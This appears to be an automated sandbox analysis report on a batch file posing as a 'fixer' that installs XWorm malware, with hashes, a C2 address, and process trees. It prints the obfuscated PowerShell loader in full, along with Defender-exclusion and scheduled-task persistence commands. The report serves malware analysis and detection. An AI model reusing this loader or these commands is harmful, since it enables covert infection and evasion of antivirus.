Analysis
-
max time kernel
2688s -
max time network
2696s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-11-2024 04:55
Static task
static1
Behavioral task
behavioral1
Sample
NLHybrid Fixer.bat
Resource
win11-20241007-en
General
-
Target
NLHybrid Fixer.bat
-
Size
547KB
-
MD5
ebc28de1911149c52af8585a0823f441
-
SHA1
d8744f6982b457ec03ce0a95ac720765abd5fa35
-
SHA256
a3b90d67811ab8ac49544ec3aa8dc427bbbc4f1342ae024127d239b301872f96
-
SHA512
6d3285a95833a36681bf27a4678655aa4d7ee23c03eb04dc134bdc7d34f3d9e33f439094cdc19c2c40994e5a472bff88aa58138a2b3822286b0db443daab4b80
-
SSDEEP
12288:Zb0+A5aTifEeJ0v0FVYQgokImBWFNxHHEdUSiaxiNFHCy0K/PUTTbLCDfomBi:ZI+A5xrJ0mYQKMNNC38M7zTraZ8
Malware Config
Extracted
xworm
5.0
request-rapidly.gl.at.ply.gg:56303
YN2uqOclkhFcLZBm
-
Install_directory
%Userprofile%
-
install_file
win64updater.exe
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/memory/1684-50-0x0000019058060000-0x0000019058070000-memory.dmp family_xworm behavioral1/memory/2780-63-0x000002B621FF0000-0x000002B62202E000-memory.dmp family_xworm behavioral1/files/0x001d00000002ab04-137.dat family_xworm behavioral1/memory/5880-148-0x0000000000AD0000-0x0000000000AE0000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 64 IoCs
flow pid Process 2 1684 powershell.exe 3 1684 powershell.exe 5 1684 powershell.exe 7 1684 powershell.exe 8 1684 powershell.exe 9 1684 powershell.exe 10 1684 powershell.exe 11 1684 powershell.exe 12 1684 powershell.exe 13 1684 powershell.exe 14 1684 powershell.exe 15 1684 powershell.exe 16 1684 powershell.exe 17 1684 powershell.exe 18 1684 powershell.exe 19 1684 powershell.exe 20 1684 powershell.exe 22 1684 powershell.exe 26 1684 powershell.exe 27 1684 powershell.exe 28 1684 powershell.exe 29 1684 powershell.exe 30 1684 powershell.exe 33 1684 powershell.exe 34 1684 powershell.exe 35 1684 powershell.exe 36 1684 powershell.exe 37 1684 powershell.exe 38 1684 powershell.exe 39 1684 powershell.exe 40 1684 powershell.exe 41 1684 powershell.exe 42 1684 powershell.exe 43 1684 powershell.exe 44 1684 powershell.exe 45 1684 powershell.exe 46 1684 powershell.exe 47 1684 powershell.exe 48 1684 powershell.exe 49 1684 powershell.exe 50 1684 powershell.exe 51 1684 powershell.exe 52 1684 powershell.exe 53 1684 powershell.exe 54 1684 powershell.exe 55 1684 powershell.exe 56 1684 powershell.exe 57 1684 powershell.exe 58 1684 powershell.exe 59 1684 powershell.exe 60 1684 powershell.exe 61 1684 powershell.exe 62 1684 powershell.exe 63 1684 powershell.exe 64 1684 powershell.exe 65 1684 powershell.exe 66 1684 powershell.exe 67 1684 powershell.exe 68 1684 powershell.exe 69 1684 powershell.exe 70 1684 powershell.exe 71 1684 powershell.exe 72 1684 powershell.exe 73 1684 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1840 powershell.exe 3024 powershell.exe 1028 powershell.exe 888 powershell.exe 2800 powershell.exe 3344 powershell.exe 1684 powershell.exe 2780 powershell.exe 5476 powershell.exe 1540 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win64updater.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win64updater.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 5880 NLHybrid Fixer NEW.exe 3124 win64updater.exe 5020 win64updater.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\win64updater = "C:\\Users\\Admin\\win64updater.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3092 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1684 powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2800 powershell.exe 2800 powershell.exe 3344 powershell.exe 3344 powershell.exe 1684 powershell.exe 1684 powershell.exe 2780 powershell.exe 2780 powershell.exe 5476 powershell.exe 5476 powershell.exe 3024 powershell.exe 3024 powershell.exe 1028 powershell.exe 1028 powershell.exe 888 powershell.exe 888 powershell.exe 1840 powershell.exe 1840 powershell.exe 1540 powershell.exe 1540 powershell.exe 1684 powershell.exe 3124 win64updater.exe 3124 win64updater.exe 5020 win64updater.exe 5020 win64updater.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe Token: 36 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe Token: 36 3344 powershell.exe Token: SeIncreaseQuotaPrivilege 3344 powershell.exe Token: SeSecurityPrivilege 3344 powershell.exe Token: SeTakeOwnershipPrivilege 3344 powershell.exe Token: SeLoadDriverPrivilege 3344 powershell.exe Token: SeSystemProfilePrivilege 3344 powershell.exe Token: SeSystemtimePrivilege 3344 powershell.exe Token: SeProfSingleProcessPrivilege 3344 powershell.exe Token: SeIncBasePriorityPrivilege 3344 powershell.exe Token: SeCreatePagefilePrivilege 3344 powershell.exe Token: SeBackupPrivilege 3344 powershell.exe Token: SeRestorePrivilege 3344 powershell.exe Token: SeShutdownPrivilege 3344 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe Token: SeSystemEnvironmentPrivilege 3344 powershell.exe Token: SeRemoteShutdownPrivilege 3344 powershell.exe Token: SeUndockPrivilege 3344 powershell.exe Token: SeManageVolumePrivilege 3344 powershell.exe Token: 33 3344 powershell.exe Token: 34 3344 powershell.exe Token: 35 3344 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1684 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 5816 wrote to memory of 2800 5816 cmd.exe 78 PID 5816 wrote to memory of 2800 5816 cmd.exe 78 PID 2800 wrote to memory of 3344 2800 powershell.exe 79 PID 2800 wrote to memory of 3344 2800 powershell.exe 79 PID 2800 wrote to memory of 4412 2800 powershell.exe 82 PID 2800 wrote to memory of 4412 2800 powershell.exe 82 PID 4412 wrote to memory of 2956 4412 WScript.exe 83 PID 4412 wrote to memory of 2956 4412 WScript.exe 83 PID 2956 wrote to memory of 1684 2956 cmd.exe 85 PID 2956 wrote to memory of 1684 2956 cmd.exe 85 PID 1684 wrote to memory of 2852 1684 powershell.exe 86 PID 1684 wrote to memory of 2852 1684 powershell.exe 86 PID 2852 wrote to memory of 2780 2852 cmd.exe 88 PID 2852 wrote to memory of 2780 2852 cmd.exe 88 PID 2780 wrote to memory of 5476 2780 powershell.exe 89 PID 2780 wrote to memory of 5476 2780 powershell.exe 89 PID 1684 wrote to memory of 3024 1684 powershell.exe 91 PID 1684 wrote to memory of 3024 1684 powershell.exe 91 PID 2780 wrote to memory of 5888 2780 powershell.exe 93 PID 2780 wrote to memory of 5888 2780 powershell.exe 93 PID 1684 wrote to memory of 1028 1684 powershell.exe 94 PID 1684 wrote to memory of 1028 1684 powershell.exe 94 PID 5888 wrote to memory of 3144 5888 WScript.exe 96 PID 5888 wrote to memory of 3144 5888 WScript.exe 96 PID 1684 wrote to memory of 888 1684 powershell.exe 97 PID 1684 wrote to memory of 888 1684 powershell.exe 97 PID 1684 wrote to memory of 1840 1684 powershell.exe 100 PID 1684 wrote to memory of 1840 1684 powershell.exe 100 PID 3144 wrote to memory of 1540 3144 cmd.exe 102 PID 3144 wrote to memory of 1540 3144 cmd.exe 102 PID 1684 wrote to memory of 3092 1684 powershell.exe 103 PID 1684 wrote to memory of 3092 1684 powershell.exe 103 PID 1540 wrote to memory of 5880 1540 powershell.exe 105 PID 1540 wrote to memory of 5880 1540 powershell.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+9QFC5LZZapP6GxfJwVt54Qjg4Lo+TheRHQIFkiyxyM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mqL/m1wOrCj8IjZfhLfaLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VtzvC=New-Object System.IO.MemoryStream(,$param_var); $xzRKe=New-Object System.IO.MemoryStream; $sJcxc=New-Object System.IO.Compression.GZipStream($VtzvC, [IO.Compression.CompressionMode]::Decompress); $sJcxc.CopyTo($xzRKe); $sJcxc.Dispose(); $VtzvC.Dispose(); $xzRKe.Dispose(); $xzRKe.ToArray();}function execute_function($param_var,$param2_var){ $dKqiL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pWSzp=$dKqiL.EntryPoint; $pWSzp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat';$xtBjl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer.bat').Split([Environment]::NewLine);foreach ($ZXShM in $xtBjl) { if ($ZXShM.StartsWith(':: ')) { $iLCed=$ZXShM.Substring(3); break; }}$payloads_var=[string[]]$iLCed.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_466_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_466.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_466.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_466.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+9QFC5LZZapP6GxfJwVt54Qjg4Lo+TheRHQIFkiyxyM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mqL/m1wOrCj8IjZfhLfaLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VtzvC=New-Object System.IO.MemoryStream(,$param_var); $xzRKe=New-Object System.IO.MemoryStream; $sJcxc=New-Object System.IO.Compression.GZipStream($VtzvC, [IO.Compression.CompressionMode]::Decompress); $sJcxc.CopyTo($xzRKe); $sJcxc.Dispose(); $VtzvC.Dispose(); $xzRKe.Dispose(); $xzRKe.ToArray();}function execute_function($param_var,$param2_var){ $dKqiL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pWSzp=$dKqiL.EntryPoint; $pWSzp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_466.bat';$xtBjl=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_466.bat').Split([Environment]::NewLine);foreach ($ZXShM in $xtBjl) { if ($ZXShM.StartsWith(':: ')) { $iLCed=$ZXShM.Substring(3); break; }}$payloads_var=[string[]]$iLCed.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mGYKXCZlRuJh42Y2Yoc5QSU2PMidG1imVsUZKs3e9hA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Oqpzdu0Suhfqr1jOik9RNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oHhqo=New-Object System.IO.MemoryStream(,$param_var); $OyOSA=New-Object System.IO.MemoryStream; $DFWli=New-Object System.IO.Compression.GZipStream($oHhqo, [IO.Compression.CompressionMode]::Decompress); $DFWli.CopyTo($OyOSA); $DFWli.Dispose(); $oHhqo.Dispose(); $OyOSA.Dispose(); $OyOSA.ToArray();}function execute_function($param_var,$param2_var){ $hdzDI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KNEkV=$hdzDI.EntryPoint; $KNEkV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat';$HYMcU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer 1.bat').Split([Environment]::NewLine);foreach ($ZMkGT in $HYMcU) { if ($ZMkGT.StartsWith(':: ')) { $TFYgT=$ZMkGT.Substring(3); break; }}$payloads_var=[string[]]$TFYgT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));7⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_645_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_645.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_645.vbs"8⤵
- Suspicious use of WriteProcessMemory
PID:5888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_645.bat" "9⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mGYKXCZlRuJh42Y2Yoc5QSU2PMidG1imVsUZKs3e9hA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Oqpzdu0Suhfqr1jOik9RNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oHhqo=New-Object System.IO.MemoryStream(,$param_var); $OyOSA=New-Object System.IO.MemoryStream; $DFWli=New-Object System.IO.Compression.GZipStream($oHhqo, [IO.Compression.CompressionMode]::Decompress); $DFWli.CopyTo($OyOSA); $DFWli.Dispose(); $oHhqo.Dispose(); $OyOSA.Dispose(); $OyOSA.ToArray();}function execute_function($param_var,$param2_var){ $hdzDI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KNEkV=$hdzDI.EntryPoint; $KNEkV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_645.bat';$HYMcU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_645.bat').Split([Environment]::NewLine);foreach ($ZMkGT in $HYMcU) { if ($ZMkGT.StartsWith(':: ')) { $TFYgT=$ZMkGT.Substring(3); break; }}$payloads_var=[string[]]$TFYgT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.exe"C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.exe"11⤵
- Executes dropped EXE
PID:5880
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\win64updater.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'win64updater.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1840
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "win64updater" /tr "C:\Users\Admin\win64updater.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:3092
-
-
-
-
-
-
C:\Users\Admin\win64updater.exeC:\Users\Admin\win64updater.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3124
-
C:\Users\Admin\win64updater.exeC:\Users\Admin\win64updater.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5020
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD5c81d47c3b95d180e012e8380740c4349
SHA1702eded5bde64ab869985b0934655e18dbdc6a70
SHA256cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc
SHA512982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1
-
Filesize
944B
MD54093e5ab3812960039eba1a814c2ffb0
SHA1b5e4a98a80be72fccd3cc910e93113d2febef298
SHA256c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c
SHA512f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b
-
Filesize
944B
MD5781da0576417bf414dc558e5a315e2be
SHA1215451c1e370be595f1c389f587efeaa93108b4c
SHA25641a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
SHA51224e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737
-
Filesize
1KB
MD54ca42e9cc6de90060a4503debda3ea58
SHA1652f325e5c423876d85ba1a164301ab2d147604b
SHA25667b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c
SHA51238303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
291KB
MD59f26640e4d15dfd331c08d3e6a9248a1
SHA12bb18d691b01e9824af1c3539bfefa7d364c16eb
SHA256d74abdf76bc9e69fee222f2314147c7ebe888181b6820ce551af77542fe3dab6
SHA5125da7a67c5fa7ed7a231e9412b6c7f704486863ca7ba4e8325425a0ebaaa023c41af4b1ca5cf6d2e84c4f7634e3f2c52a8265e35a9c48cd10c039c689ae8f1f60
-
Filesize
42KB
MD58b21fb92607aca8f4ac65b7847de3ec5
SHA152e81900805a878a057942687b1ad56ff0d514b3
SHA256852ef505e8e0e9e0d7d2779bcbdaa93bfedd4689d03a8b43fe7e50b82e8665ca
SHA5123514308891d5357648fffd1a8f001c25ecb4af1dcb1203fbabcdfd97795fc192d00d58f09c756286e33eb59f96ca73fc878efc392164691a91dd21bfdbc10e9a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
